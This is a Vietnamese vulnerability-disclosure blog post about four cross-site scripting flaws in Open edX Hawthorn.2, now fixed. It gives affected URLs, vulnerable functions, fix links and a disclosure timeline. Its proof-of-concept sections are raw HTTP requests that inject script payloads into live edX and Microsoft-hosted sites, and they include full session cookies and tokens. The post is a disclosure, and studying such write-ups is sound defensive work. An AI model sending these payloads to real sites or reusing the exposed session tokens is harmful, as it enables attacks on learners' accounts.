ITAS SECURITY TEAM PHÁT HIỆN NHIỀU LỖ HỔNG BẢO MẬT TRÊN HỆ THỐNG HỌC TRỰC TUYẾN OPEN EDX

Open eDX (https://github.com/edx/edx-platform) là hệ thống đào tạo trực tuyến được phát triển bởi Havard và MIT từ năm 2012. Open eDX được sử dụng bởi nhiều tổ chức quốc tế như Microsoft, IBM, đại học Harvard, đại học MIT, đại học Stanford và các tổ chức khác trên thế giới. Trong quá trình kiểm tra bảo mật cho khách hàng sử dụng hệ thống Open eDX, ITAS SECURITY TEAM đã phát hiện ra một số lỗ hổng bảo mật ở trong mã nguồn Open eDX (Hawthorn.2 release 06/29/2018 ). Các lỗ hổng bao gồm Stored Cross Site Scripting (Stored XSS) và Reflected Cross Site Scripting (Reflected XSS). Hacker có thể lợi dụng lỗ hổng bảo mật này để tấn công người dùng hệ thống Open eDX.

Sau khi ITAS Security Team thông báo cho EdX về các lỗ hổng bảo mật, EdX đã kiểm tra và xác nhận tổng cộng 4 lỗi bảo mật CAT-1. ITAS Team tiếp tục kiểm tra các lỗi đã thông báo lần thứ hai. Để bày tỏ sự đánh giá cao của họ, EdX đã gửi tặng cho các chuyên gia của ITAS  phần thưởng trị giá $600 USD.

“Thank you so much for your hard work to make edx.org more secure for its millions of learners worldwide. As a non-profit opensource company we really appreciate you taking the time to find and disclose these issues to us directly.” Trích email của EdX Security Team gửi đến các chuyên gia của ITAS.

Cross Site Scripting còn được biết đến với tên XSS là lỗi thứ 7 trong TOP 10 -2017 của tổ chức OWASP (https://www.owasp.org/index.php/Top_10-2017_A7-Cross-Site_Scripting_(XSS)). Thông qua lỗ hổng XSS hacker sẽ chèn các mã độc vào mã nguồn của ứng dụng từ đó ăn cắp phiên giao dịch, tương tác với browser của người dùng và có thể phát triển thêm các dạng tấn công khác đến người dùng cuối.

Trong quá trình khảo sát, chúng tôi nhận thấy rằng các hệ thống học trực tuyến sử dụng phiên bản lỗi đều có nguy cơ bị tấn công và khai thác, đơn cử một số site sau đây:

  • https://courses.edx.org
  • https://openedx.microsoft.com
  • https://openedx.gse.harvard.edu
  • https://lagunita.stanford.edu
  • https://lms.mitx.mit.edu
  • https://university.redislab.com
  • https://openedx.open.ac.uk/
  • https://campus.gov.il
  • https://demo.edunext.io/

1. Thông Tin Ứng Dụng

Vendor : https://open.edx.org/
Download link: https://github.com/edx/edx-platform
Vulnerable version: Hawthorn.2
Fixed version: Ironwood.3
Release date: 2019-02-27

2. Thông Tin Lỗ Hỏng Bảo Mật

a. Template – URL Cross Site Scripting

Vulnerability name: URL Cross Site Scripting
Affected URL : https://openedx-site.com/template/{PAYLOAD}
Parameter name :
Parameter Type : GET
Sample payload: <script>alert(‘XSS’)<script>
Condition to attack:
Vulnerable file: openedx/core/djangoapps/debug/views.py
Vulnerable function: show_reference_template
Fixed link: https://github.com/edx/edx-platform/pull/19615

Proof of concept

Request

GET /template/<script>alert(‘XSS’)</script> HTTP/1.1
Host: courses.edx.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response

HTTP/1.1 404 Not Found
Content-Language: en
Content-Type: text/html; charset=utf-8
Date: Mon, 17 Dec 2018 09:03:38 GMT
Server: nginx
Vary: Accept-Encoding
Vary: Accept-Language, Cookie
X-Frame-Options: DENY
Content-Length: 46
Connection: Close

Missing template <script>alert(‘XSS’)</script>

Video (Demonstration in openedx.microsoft.com)

b. Xblock – Reflected Cross Site Scripting

Vulnerability name: Reflected Cross Site Scripting
Affected URL : https://courses.edx.org/xblock/{USAGE_ID}?view={PAYLOAD}
Parameter name : view
Parameter Type : GET
Sample payload: <script>alert(‘XSS’)<script>
Condition to attack:
Vulnerable file: lms/djangoapps/courseware/views/views.py
Vulnerable function: render_xblock
Fixed link: https://github.com/edx/edx-platform/pull/19517

Proof of concep

Request

GET /xblock/block-v1:edX+DemoX+Demo_Course+type@vertical+block@vertical?view=<script>alert(“XSS”)</script>
HTTP/1.1
Host: openedx.microsoft.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

Response

HTTP/1.1 400 Bad Request
Cache-control: no-cache=”set-cookie”
Content-Language: en
Content-Type: text/html; charset=utf-8
Date: Mon, 17 Dec 2018 09:15:49 GMT
Server: nginx
Set-Cookie: AWSELB=D1EF6B6510E347E5B895826CD53CF4FD55E0CFA9A9FFA4D0509C04A79307C543BC7A564BF3102652C9DDBF45788A0111B01830935A583EAE591F65FD084E6693F1009EDC31;PATH=/;MAX-AGE=120
Vary: Accept-Language, Cookie
Content-Length: 78
Connection: Close

Rendering of the xblock view ‘<script>alert(‘XSS’)</script>’ is not supported.

Video (Demonstration in openedx.microsoft.com)

 

c. Certificate – Reflected Cross Site Scripting

Vulnerability name: Reflected Cross-site Scripting
Affected URL : http://openedx-site.com/certificates/search/?user={PAYLOAD}
Parameter name : user
Parameter Type : GET
Sample payload: <script>alert(‘XSS’)<script>
Condition to attack: Required staff role or higher
Vulnerable file: lms/djangoapps/certificates/views/support.py
Vulnerable function: search_certificates
Fixed link: https://github.com/edx/edx-platform/pull/19519

Proof of concept

Request

GET /certificates/search/?user=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E HTTP/1.1
Host: openedx.local
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: csrftoken=YexdtVBq17ovoP4JX4z0JVJprr7Jwt8m5ftnkPEztOkctN0BjVUMtWcDxcID3Fbc; experiments_is_enterprise=false; openedx-language-preference=en; edxloggedin=true; sessionid=”1|ud7b2zkplcv2zzrbkkk06wtkq6ced7tp|qtpnFD16krkG|IjQ2MTA5N2NmNGEwOWFkNjNjNzJjNDg1MGQ4NDE5MTc1YTNiYTAwYTYzYmQ2NDg0NjgwYWQ3NDk4OTVhNDFmYzQi:1gYpH7:wa4qHQbmWjRbERxcmREcFCezcec”; edx-user-info=”{\”username\”: \”staff\”\054 \”version\”: 1\054 \”enrollmentStatusHash\”: \”09d498ab1dd69884525f4cdfa9cca6a6\”\054 \”header_urls\”: {\”learner_profile\”: \”http://192.168.1.238/u/staff\”\054 \”resume_block\”: \”http://192.168.1.238/dashboard\”\054 \”logout\”: \”http://192.168.1.238/logout\”\054 \”account_settings\”: \”http://192.168.1.238/account/settings\”}}”
Upgrade-Insecure-Requests: 1

Response

HTTP/1.1 400 Bad Request
Server: nginx
Date: Mon, 17 Dec 2018 09:34:29 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 51
Connection: close
Vary: Accept-Language, Cookie
X-Frame-Options: ALLOW
Content-Language: en
Set-Cookie: openedx-language-preference=en; expires=Mon, 31-Dec-2018 09:34:29 GMT; Max-Age=1209600; Path=/

user ‘<script>alert(‘XSS’)</script>’ does not exist

Video (Demonstration in openedx.local)

 

d. Wiki – Stored Cross Site Scripting

Vulnerability name: Stored Cross Site Scripting
Affected URL : https://openedx-site.com/courses/{Course_id}/course_wiki
Parameter name : content
Parameter Type : POST
Sample payload: <script>alert(‘XSS’)<script>
Condition to attack: registered user
Vulnerable file: lms/djangoapps/course_wiki/views.py
Vulnerable function: course_wiki_redirect
Fixed link: https://github.com/edx/edx-platform/pull/20633/files

Step to reproduce : Login as student user and following the step below
Step 1: Access course wiki by adding course_wiki at the end of course URL (No matter that the course has a wiki or not. E.g: https://courses.edx.org/courses/course-v1:AdelaideX+ProgramX+3T2018/course_wiki)
Step 2: Click Edit button and put XSS payload(<script>alert(‘XSS’)</script>) into wiki content then save it.
Step 3: Payload popup on https://courses.edx.org/wiki/{Course-id}/ (E.g: https://courses.edx.org/wiki/course-v1:Ade

Proof of concept

Request 1

GET /courses/course-v1:AdelaideX+ProgramX+3T2018/course_wiki HTTP/1.1
Host: courses.edx.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: __cfduid=dd721431718a63918f0bf0852e5ef08a61542883934; csrftoken=TfcOjleCHqbyXGJxLOPdkRTwsLD6iixrgr35L54daxwvAzYi7b1vw5lx9ocibtSw; optimizelyEndUserId=oeu1543736784624r0.18289740247694908; ajs_user_id=%2221697598%22; ajs_group_id=null; ajs_anonymous_id=%2233ce0d14-baab-4869-b1a2-0e550cc66925%22; ki_t=1543736796101%3B1543806787761%3B1543819835121%3B2%3B50; prod-edx-cookie-policy-viewed=true; experiments_is_enterprise=false; sailthru_hid=a0c772079f0b6ed2de5109edefd437855c04a0ec20122e70f812a608c5d1304171706d82698352ffec62a6ae; prod-edx-language-preference=en; prod-edx-csrftoken=vCmAAKia73Q0PvtiRSICwRGHQoBQ3Xbcph0MDeLZASiaQkWa8OaoSwROinyiDVl9; prod-edx-sessionid=”1|cpe7mabx3xu2f9iin3hvwuasknkzyqr0|LhDSMPmPeLXm|ImJmYmEyOGU2YjEyYWU1MmE0ZjU3N2Q5MWM5YjFiNTlhOGI4YTYyMDg0MDkxMGQwMWJkYmVjMWI5NmJiNWE4MzYi:1gW1c1:CRVkyoeUJrFVDvv05frdTNMWZs0″; edxloggedin=true; edx-jwt-cookie-header-payload=eyJhbGciOiJSUzUxMiIsImtpZCI6Imxtc3Byb2QwMDEifQ.eyJzY29wZXMiOiBbImVtYWlsIiwgInByb2ZpbGUiXSwgImFkbWluaXN0cmF0b3IiOiBmYWxzZSwgInByZWZlcnJlZF91c2VybmFtZSI6ICJzdHVkZW50ZGVtbzEiLCAiZmlsdGVycyI6IFsidXNlcjptZSJdLCAiaWF0IjogMTU0NDM3MTYzMCwgInN1YiI6ICIxZmE2NjViMmRjNmYxZWQ3OGExNGQ0MjZmYjk0YjQ1YyIsICJmYW1pbHlfbmFtZSI6ICIiLCAiYXVkIjogInJpbm15YnllZG51YXc1cGhsaWRDb2NEdWRieWxiT2JEaWJKb2Rib3NnZXRzRWJhbGQ0IiwgImlzcyI6ICJodHRwczovL2NvdXJzZXMuZWR4Lm9yZy9vYXV0aDIiLCAiZW1haWxfdmVyaWZpZWQiOiB0cnVlLCAibmFtZSI6ICJzdHVkZW50ZGVtbzEiLCAidmVyc2lvbiI6ICIxLjEuMCIsICJnaXZlbl9uYW1lIjogIiIsICJleHAiOiAxNTQ0Mzc1MjMwLCAiaXNfcmVzdHJpY3RlZCI6IGZhbHNlLCAiZW1haWwiOiAic3R1ZGVudGRlbW8xQG1haWxpbmF0b3IuY29tIn0; edx-jwt-cookie-signature=lqvrwBViGUEij8AKc8FlWd1oa99bDtNGkmVkuobGLhE43W6qrEg2IvfzojsZnFgQiqJ3Be2D4Xp93of_qdo0AwP8EvwMdDEukqxJ68dMgFxa7e7gfLbhnCiGPYpLfdEywCQk_UerlrkPgz3WXO8hORydaNwD-bpe_yRpamZHburWw4DYJZjYIYRVaiHHc6KcaERQQLphQrD0zghp4sbd-nCIOfQcMy9mjE80Aq5jQydPJXUAlFcxC14XlR8x63P8WEV5Y0mUkEpud6wm3TnK_8oE8aCXk8OepYs1qSAtLj2tuBdSlVwuGqMkHtyTSYBchYjOAkMCQ6098POiTsLKDg; edx-jwt-refresh-cookie=B36A3caqItGpd80pKcNJKeL9fv51Os; prod-edx-user-info=”{\”username\”: \”studentdemo1\”\054 \”version\”: 1\054 \”enrollmentStatusHash\”: \”02c23d94693a6636ea722152eab98136\”\054 \”header_urls\”: {\”learner_profile\”: \”https://courses.edx.org/u/studentdemo1\”\054 \”resume_block\”: \”https://courses.edx.org/dashboard\”\054 \”logout\”: \”https://courses.edx.org/logout\”\054 \”account_settings\”: \”https://courses.edx.org/account/settings\”}}”
Upgrade-Insecure-Requests: 1

Response 1

HTTP/1.1 302 Found
Cache-control: no-cache=”set-cookie”
Content-Language: en
Content-Type: text/html; charset=utf-8
Date: Sun, 09 Dec 2018 16:08:03 GMT
Location: /wiki/AdelaideX.Code101x.3T2015/
P3P: CP=”edX does not have a P3P policy. Review our privacy policy at https://edx.org/privacy”
Server: nginx
Set-Cookie: prod-edx-language-preference=en; Domain=.edx.org; expires=Sun, 23-Dec-2018 16:08:03 GMT; Max-Age=1209600; Path=/
Set-Cookie: AWSELB=D1EF6B6510E347E5B895826CD53CF4FD55E0CFA9A93C0FAA65DA3F08F760218CFB1EAA2596E2F643BD06A9A0A502731C115A29A9CB909D18A431441A942FF35DD4A76CC255;PATH=/;MAX-AGE=120
Strict-Transport-Security: max-age=3600
Vary: Accept-Language, Cookie
X-Frame-Options: DENY
Content-Length: 0
Connection: Close

Resquest 2

POST /wiki/AdelaideX.Code101x.3T2015/_edit/ HTTP/1.1
Host: courses.edx.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://courses.edx.org/wiki/AdelaideX.Code101x.3T2015/_edit/
Content-Type: multipart/form-data; boundary=—————————112257516914770264881620708143
Content-Length: 954
DNT: 1
Connection: close
Cookie: __cfduid=dd721431718a63918f0bf0852e5ef08a61542883934; csrftoken=TfcOjleCHqbyXGJxLOPdkRTwsLD6iixrgr35L54daxwvAzYi7b1vw5lx9ocibtSw; optimizelyEndUserId=oeu1543736784624r0.18289740247694908; ajs_user_id=%2221697598%22; ajs_group_id=null; ajs_anonymous_id=%2233ce0d14-baab-4869-b1a2-0e550cc66925%22; ki_t=1543736796101%3B1543806787761%3B1543819835121%3B2%3B50; prod-edx-cookie-policy-viewed=true; experiments_is_enterprise=false; sailthru_hid=a0c772079f0b6ed2de5109edefd437855c04a0ec20122e70f812a608c5d1304171706d82698352ffec62a6ae; prod-edx-language-preference=en; prod-edx-csrftoken=vCmAAKia73Q0PvtiRSICwRGHQoBQ3Xbcph0MDeLZASiaQkWa8OaoSwROinyiDVl9; prod-edx-sessionid=”1|cpe7mabx3xu2f9iin3hvwuasknkzyqr0|LhDSMPmPeLXm|ImJmYmEyOGU2YjEyYWU1MmE0ZjU3N2Q5MWM5YjFiNTlhOGI4YTYyMDg0MDkxMGQwMWJkYmVjMWI5NmJiNWE4MzYi:1gW1c1:CRVkyoeUJrFVDvv05frdTNMWZs0″; edxloggedin=true; edx-jwt-cookie-header-payload=eyJhbGciOiJSUzUxMiIsImtpZCI6Imxtc3Byb2QwMDEifQ.eyJzY29wZXMiOiBbImVtYWlsIiwgInByb2ZpbGUiXSwgImFkbWluaXN0cmF0b3IiOiBmYWxzZSwgInByZWZlcnJlZF91c2VybmFtZSI6ICJzdHVkZW50ZGVtbzEiLCAiZmlsdGVycyI6IFsidXNlcjptZSJdLCAiaWF0IjogMTU0NDM3MTYzMCwgInN1YiI6ICIxZmE2NjViMmRjNmYxZWQ3OGExNGQ0MjZmYjk0YjQ1YyIsICJmYW1pbHlfbmFtZSI6ICIiLCAiYXVkIjogInJpbm15YnllZG51YXc1cGhsaWRDb2NEdWRieWxiT2JEaWJKb2Rib3NnZXRzRWJhbGQ0IiwgImlzcyI6ICJodHRwczovL2NvdXJzZXMuZWR4Lm9yZy9vYXV0aDIiLCAiZW1haWxfdmVyaWZpZWQiOiB0cnVlLCAibmFtZSI6ICJzdHVkZW50ZGVtbzEiLCAidmVyc2lvbiI6ICIxLjEuMCIsICJnaXZlbl9uYW1lIjogIiIsICJleHAiOiAxNTQ0Mzc1MjMwLCAiaXNfcmVzdHJpY3RlZCI6IGZhbHNlLCAiZW1haWwiOiAic3R1ZGVudGRlbW8xQG1haWxpbmF0b3IuY29tIn0; edx-jwt-cookie-signature=lqvrwBViGUEij8AKc8FlWd1oa99bDtNGkmVkuobGLhE43W6qrEg2IvfzojsZnFgQiqJ3Be2D4Xp93of_qdo0AwP8EvwMdDEukqxJ68dMgFxa7e7gfLbhnCiGPYpLfdEywCQk_UerlrkPgz3WXO8hORydaNwD-bpe_yRpamZHburWw4DYJZjYIYRVaiHHc6KcaERQQLphQrD0zghp4sbd-nCIOfQcMy9mjE80Aq5jQydPJXUAlFcxC14XlR8x63P8WEV5Y0mUkEpud6wm3TnK_8oE8aCXk8OepYs1qSAtLj2tuBdSlVwuGqMkHtyTSYBchYjOAkMCQ6098POiTsLKDg; edx-jwt-refresh-cookie=B36A3caqItGpd80pKcNJKeL9fv51Os; prod-edx-user-info=”{\”username\”: \”studentdemo1\”\054 \”version\”: 1\054 \”enrollmentStatusHash\”: \”02c23d94693a6636ea722152eab98136\”\054 \”header_urls\”: {\”learner_profile\”: \”https://courses.edx.org/u/studentdemo1\”\054 \”resume_block\”: \”https://courses.edx.org/dashboard\”\054 \”logout\”: \”https://courses.edx.org/logout\”\054 \”account_settings\”: \”https://courses.edx.org/account/settings\”}}”; AWSELB=D1EF6B6510E347E5B895826CD53CF4FD55E0CFA9A93C0FAA65DA3F08F760218CFB1EAA2596E2F643BD06A9A0A502731C115A29A9CB909D18A431441A942FF35DD4A76CC255
Upgrade-Insecure-Requests: 1

—————————–112257516914770264881620708143
Content-Disposition: form-data; name=”csrfmiddlewaretoken”

CK0hVpI1d4KR43siLr4ssdOe8sKg1y6GZWRyn9yCGb5OHWH37OgKErgfP5jsUJrL
—————————–112257516914770264881620708143
Content-Disposition: form-data; name=”title”

Programming for Data Science
—————————–112257516914770264881620708143
Content-Disposition: form-data; name=”content”

This is the wiki for **AdelaideX**’s _Programming for Data Science_.
<script>alert(‘XSS’)</script>
—————————–112257516914770264881620708143
Content-Disposition: form-data; name=”summary”

—————————–112257516914770264881620708143
Content-Disposition: form-data; name=”current_revision”

89992
—————————–112257516914770264881620708143
Content-Disposition: form-data; name=”save”

1
—————————–112257516914770264881620708143–

Response 2

HTTP/1.1 302 Found
Content-Language: en
Content-Type: text/html; charset=utf-8
Date: Sun, 09 Dec 2018 16:08:45 GMT
Location: /wiki/AdelaideX.Code101x.3T2015/
P3P: CP=”edX does not have a P3P policy. Review our privacy policy at https://edx.org/privacy”
Server: nginx
Set-Cookie: prod-edx-language-preference=en; Domain=.edx.org; expires=Sun, 23-Dec-2018 16:08:45 GMT; Max-Age=1209600; Path=/
Set-Cookie: prod-edx-sessionid=”1|cpe7mabx3xu2f9iin3hvwuasknkzyqr0|EPbOgM6D4T9p|ImJmYmEyOGU2YjEyYWU1MmE0ZjU3N2Q5MWM5YjFiNTlhOGI4YTYyMDg0MDkxMGQwMWJkYmVjMWI5NmJiNWE4MzYi:1gW1dN:kxL_2U1JA0cAvinLbyXEfZppkvY”; Domain=.edx.org; expires=Sun, 06-Jan-2019 16:08:45 GMT; httponly; Max-Age=2419200; Path=/; secure
Strict-Transport-Security: max-age=3600
Vary: Accept-Language, Cookie
X-Frame-Options: DENY
Content-Length: 0
Connection: Close

Request 3

GET /wiki/AdelaideX.Code101x.3T2015/ HTTP/1.1
Host: demo.edunext.io
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://courses.edx.org/wiki/AdelaideX.Code101x.3T2015/_edit/
DNT: 1
Connection: close
Cookie: prod-edx-sessionid=”1|7ahalk3pygy48xh6l70e6j4ia96n4zet|IkblSszTjSXs|ImI5Y2FjMmY2YjZhOTk0NGVhZjBhMmE4NDFkMDA0ZDYwNDRiZDk5OTcyZTgzNGEzZjBiYmQ2MzIxYTg1OTRkNjAi:1gWg0X:V-pHtUuxjSFjVnSWN2DHssjuAYI”; csrftoken=wrJd3S6iaVCkkHNEQVVqTUywZaLtftQCZcLZiHxOD1P6NqPO443rAJTU8RelRJps; __cfduid=de755c9ba6493ba36d514c937c9f5528b1544526347; optimizelyEndUserId=oeu1544526349200r0.564235344454921; ajs_user_id=%2221697598%22; ajs_group_id=null; ajs_anonymous_id=%22de57a2d3-488b-4ada-960a-c6af0997df5b%22; experiments_is_enterprise=false; ki_t=1544526815310%3B1544526815310%3B1544526855356%3B1%3B2; edxloggedin=true; sailthru_hid=a0c772079f0b6ed2de5109edefd437855c04a0ec20122e70f812a608c5d1304171706d82698352ffec62a6ae; edx-jwt-cookie-header-payload=eyJhbGciOiJSUzUxMiIsImtpZCI6Imxtc3Byb2QwMDEifQ.eyJzY29wZXMiOiBbImVtYWlsIiwgInByb2ZpbGUiXSwgImFkbWluaXN0cmF0b3IiOiBmYWxzZSwgInByZWZlcnJlZF91c2VybmFtZSI6ICJzdHVkZW50ZGVtbzEiLCAiZmlsdGVycyI6IFsidXNlcjptZSJdLCAiaWF0IjogMTU0NDUyNjgyNCwgInN1YiI6ICIxZmE2NjViMmRjNmYxZWQ3OGExNGQ0MjZmYjk0YjQ1YyIsICJmYW1pbHlfbmFtZSI6ICIiLCAiYXVkIjogInJpbm15YnllZG51YXc1cGhsaWRDb2NEdWRieWxiT2JEaWJKb2Rib3NnZXRzRWJhbGQ0IiwgImlzcyI6ICJodHRwczovL2NvdXJzZXMuZWR4Lm9yZy9vYXV0aDIiLCAiZW1haWxfdmVyaWZpZWQiOiB0cnVlLCAibmFtZSI6ICJzdHVkZW50ZGVtbzEiLCAidmVyc2lvbiI6ICIxLjEuMCIsICJnaXZlbl9uYW1lIjogIiIsICJleHAiOiAxNTQ0NTMwNDI0LCAiaXNfcmVzdHJpY3RlZCI6IGZhbHNlLCAiZW1haWwiOiAic3R1ZGVudGRlbW8xQG1haWxpbmF0b3IuY29tIn0; edx-jwt-cookie-signature=kHy194pQ77QiK-gwvWsvIZvBvCHfRrJedvWHyS3SvONFx-ui8sXhZ2vZ0crVVjl-LHw9No30E_GSTmSOIiZ6Szu9MJm-0eFlOVLXziztwS7XcmfF8U2yBcLck40MuqlxLAIwAxjSDSbMNCJE0oKeNzUrFqUnTJuRYcqHmXiIHiK07hTQosEFMOXThirlJqTPFndnRUC3ZLHEsR6zlIcjW94hv_8VX3Ghf-nHGAq7t-E3b8EZgMOWw52vVKoL0xDLHSMphKVceX9w2GPzKSVUop3S5WK8yPJO3F5Zsjtj8F_ll7zeY-r-FTBqBo1MuRaQAdmQhCl0NIujNTsEEa-GKg; prod-edx-language-preference=en; edx-jwt-refresh-cookie=QplV797j5qcL5sqThFjeA4o8BwHQFN; prod-edx-user-info=”{\”username\”: \”studentdemo1\”\054 \”version\”: 1\054 \”enrollmentStatusHash\”: \”02c23d94693a6636ea722152eab98136\”\054 \”header_urls\”: {\”learner_profile\”: \”https://courses.edx.org/u/studentdemo1\”\054 \”resume_block\”: \”https://courses.edx.org/dashboard\”\054 \”logout\”: \”https://courses.edx.org/logout\”\054 \”account_settings\”: \”https://courses.edx.org/account/settings\”}}”; prod-edx-cookie-policy-viewed=true
Upgrade-Insecure-Requests: 1

Response 3

HTTP/1.1 200 OK
Cache-control: no-cache=”set-cookie”
Content-Language: en
Content-Type: text/html; charset=utf-8
Date: Tue, 11 Dec 2018 11:23:58 GMT
P3P: CP=”edX does not have a P3P policy. Review our privacy policy at https://edx.org/privacy”
Server: nginx
Set-Cookie: csrftoken=wrJd3S6iaVCkkHNEQVVqTUywZaLtftQCZcLZiHxOD1P6NqPO443rAJTU8RelRJps; expires=Tue, 10-Dec-2019 11:23:58 GMT; Max-Age=31449600; Path=/; secure
Set-Cookie: prod-edx-language-preference=en; Domain=.edx.org; expires=Tue, 25-Dec-2018 11:23:58 GMT; Max-Age=1209600; Path=/
Set-Cookie: AWSELB=D1EF6B6510E347E5B895826CD53CF4FD55E0CFA9A90749CECFD3E3A420861CE2F36D6BE86B832CBCF80A5BC96B29B65129A6F54A14F6993CFC88318D16B35C6A99B60FC936;PATH=/;MAX-AGE=120
Strict-Transport-Security: max-age=3600
Vary: Accept-Encoding
Vary: Accept-Language, Cookie
X-Frame-Options: DENY
Content-Length: 37551
Connection: Close

……….SNIPPET……….
<div class=”wiki-article”>
<p>This is the wiki for <strong>AdelaideX</strong>’s <em>Programming for Data Science</em>.
<script>alert(‘XSS’)</script></p>
</div>
……….SNIPPET……….

Video (Demonstration in demo.edunext.io)

 

Tuyên bố miễn trừ trách nhiệm
Tác giả không chịu trách nhiệm cho bất kỳ việc lạm dụng thông tin ở trên đây và không chịu trách nhiệm cho bất kỳ thiệt hại nào do việc sử dụng hoặc sử dụng sai mục đích các hướng dẫn này. Tác giả nghiêm cấm mọi hành vi sử dụng  các lỗi bảo mật ở trên để khai thác và gây thiệt hại cho các tổ chức ở trên và các tổ chức khác.

Tiết Lộ Thông Tin
+ 25/12/2018: phát hiện các lỗi bảo mật.
+ 26/12/2018: liên hệ và gửi thông tin các lỗi đến EDX Security Team
+ 15/01/2019: EDX Security Team xác nhận các lỗi bảo mật.
+ 18/01/2019: EDX phát hiện phiên bản mới vá lỗi.
+ 18/04/2019: công bố thông tin.

/ Blog / Tags: , ,